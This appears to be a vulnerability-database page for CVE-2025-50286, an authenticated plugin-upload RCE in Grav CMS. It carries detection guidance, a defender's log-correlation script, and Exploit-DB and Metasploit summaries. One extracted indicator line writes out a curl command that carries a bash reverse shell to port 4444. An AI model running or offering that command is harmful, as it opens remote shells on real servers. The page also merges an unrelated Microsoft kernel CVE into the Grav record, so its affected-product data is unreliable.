CVE-2025-50286
Published 2025-08-06
Priority: P2 69 · Severity: high · CVSS 3.1 base score: 8.1
CVSS vector: AV:N / AC:H / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploit: public exploit available (see the Exploit-DB and Metasploit entries below)
EPSS: 8.71% (94.5th percentile)
A Remote Code Execution (RCE) vulnerability in Grav CMS v1.7.48 allows an authenticated admin to upload a malicious plugin via the /admin/tools/direct-install interface. Once uploaded, the plugin is automatically extracted and loaded, allowing arbitrary PHP code execution and reverse shell access.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| getgrav | grav | — | — |
| msrc | azl3_kernel_6.6.57.1-7_on_azure_linux_3.0 | — | — |
| msrc | cbl2_kernel_5.15.180.1-1_on_cbl_mariner_2.0 | — | — |
Detection & IOCs (extracted from sources)
Command: `curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http:///`
Detection guidance:
- Monitor HTTP POST requests to /admin/tools/direct-install containing ZIP file uploads; malicious archives follow the structure of a plugin directory with a PHP file and blueprints.yaml.
- Alert on web server processes (e.g., www-data/apache2) spawning outbound TCP connections or bash reverse shells, particularly to non-standard ports such as 4444.
- Detect newly created PHP files under the Grav plugins directory following a ZIP upload to the Direct Install endpoint, as the uploaded plugin is written to disk and executed by the application.
Caveats:
- Exploitation requires valid admin-level credentials; this is an authenticated RCE, not unauthenticated. Detection should focus on admin-authenticated sessions performing plugin uploads.
- The Metasploit module targets Grav CMS versions 1.1.x–1.7.x with Admin Plugin 1.2.x–1.10.x; scope detection rules accordingly and do not apply to versions outside this range.
- The NVD entry and exploit-db reference Grav CMS v1.7.48, while the Metasploit module extends coverage to <=1.7.49.5 / Admin Plugin <=1.10.49.3; ensure patching covers the full affected range.
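The first and third monitoring points above (a POST to the Direct Install endpoint followed by new PHP files under the plugins directory) as one correlation rule, written here as an added defender-side example that is not from the page's sources; the access-log lines, the file-creation events and the /var/www/grav install path are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample data (not real traffic): combined-format web-server access
# log lines and file-creation events in a simple "<ISO timestamp> <path>" form,
# as an inotify/auditd forwarder might emit them.
ACCESS_LOG = [
    '10.0.0.5 - - [07/Aug/2025:12:00:01 +0000] "GET /admin HTTP/1.1" 200 5120',
    '10.0.0.5 - - [07/Aug/2025:12:00:09 +0000] "POST /admin/tools/direct-install HTTP/1.1" 302 0',
    '10.0.0.7 - - [07/Aug/2025:12:00:11 +0000] "GET /blog HTTP/1.1" 200 8192',
]
FILE_EVENTS = [
    "2025-08-07T12:00:10+00:00 /var/www/grav/user/plugins/demo/blueprints.yaml",
    "2025-08-07T12:00:10+00:00 /var/www/grav/user/plugins/demo/demo.php",
    "2025-08-07T13:30:00+00:00 /var/www/grav/cache/compiled/files/x.php",
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
DIRECT_INSTALL = "/admin/tools/direct-install"
PLUGINS_DIR = "/var/www/grav/user/plugins/"  # assumed Grav install path


def direct_install_posts(lines):
    """Return (timestamp, client_ip) for every POST to the Direct Install endpoint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and m["path"].split("?", 1)[0] == DIRECT_INSTALL:
            hits.append((datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), m["ip"]))
    return hits


def new_plugin_php(events):
    """Return (timestamp, path) for .php files created under the plugins directory."""
    hits = []
    for ev in events:
        ts, path = ev.split(" ", 1)
        if path.startswith(PLUGINS_DIR) and path.lower().endswith(".php"):
            hits.append((datetime.fromisoformat(ts), path))
    return hits


def correlate(access_lines, file_events, window_seconds=60):
    """Alert when plugin PHP is written within the window after a Direct Install POST."""
    alerts = []
    for post_ts, ip in direct_install_posts(access_lines):
        for file_ts, path in new_plugin_php(file_events):
            if timedelta(0) <= file_ts - post_ts <= timedelta(seconds=window_seconds):
                alerts.append({"client": ip, "upload_at": post_ts.isoformat(), "php_file": path})
    return alerts
```

Legitimate plugin installs also trigger this rule, so the alert is meant to be reviewed against the admin session that performed the upload rather than treated as a confirmed compromise on its own.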
CVSS provenance
- NVD (CVSS v3.1): 8.1 HIGH, CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
- Vendor (MSRC): 7.0 HIGH
GHSA
GHSA-wqvw-453m-rjm2 · ghsa_unreviewed · 2025-08-06 · CVE-2025-50286 [HIGH] · CWE-434
A Remote Code Execution (RCE) vulnerability in Grav CMS v1.7.48 allows an authenticated admin to upload a malicious plugin via the /admin/tools/direct-install interface. Once uploaded, the plugin is automatically extracted and loaded, allowing arbitrary PHP code execution and reverse shell access.
Microsoft
CVE-2024-50286 [HIGH] · CWE-416 · vendor_msrc · 2024-11-12 · CVSS 7.0
ksmbd: fix slab-use-after-free in ksmbd_smb2_session_create
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of the main benefits to our customers who choose to use the Azure Linux distro is the commitment to keep it up to date with the most recent and most secure versions of the open source libraries of which the distro is composed. Microsoft is committed to transparency in this work, which is why we began publishing CSAF/VEX in October 2025. See this blog post for more information. If impact to additional products is identified, we will update the CVE to reflect this.
Customer Action Required: Yes
Remediation: CBL-Mariner Releases
Reference: https://l
No detection rules found.
Exploit-DB
Grav CMS 1.7.48 - Remote Code Execution (RCE) · exploitdb · 2025-08-11 · CVSS 8.1 · CVE-2025-50286 [HIGH]
---
# Exploit Title: Grav CMS 1.7.48 - Remote Code Execution (RCE)
# Date: 2025-08-07
# Exploit Author: binneko (https://github.com/binneko)
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav/releases/tag/1.7.48
# Version: Grav CMS v1.7.48 / Admin Plugin v1.10.48
# Tested on: Debian 11, Apache2, PHP 7.4
# CVE: CVE-2025-50286
# Description:
Grav CMS v1.7.48 with Admin Plugin v1.10.48 is vulnerable to Authenticated Remote Code Execution (RCE)
through the "Direct Install" feature in the admin panel. An authenticated administrator can upload
a malicious plugin that contains arbitrary PHP code, which will be executed by the server upon access.
# Steps to Reproduce:
1. Start a listener on your attack machine
Metasploit
Grav CMS Admin Direct Install Authenticated Plugin Upload RCE · metasploit
Grav CMS version <=1.7.49.5 with Admin Plugin version <=1.10.49.3 is vulnerable to authenticated remote code execution via the "Direct Install" feature in the administrative interface. An authenticated administrator can upload a crafted plugin archive containing arbitrary PHP code. The uploaded plugin is written to disk and executed by the application, allowing command execution in the context of the web server user. This module authenticates to the admin panel, uploads a malicious plugin via /admin/tools/direct-install, and triggers execution of the embedded payload.
Published: 2025-08-06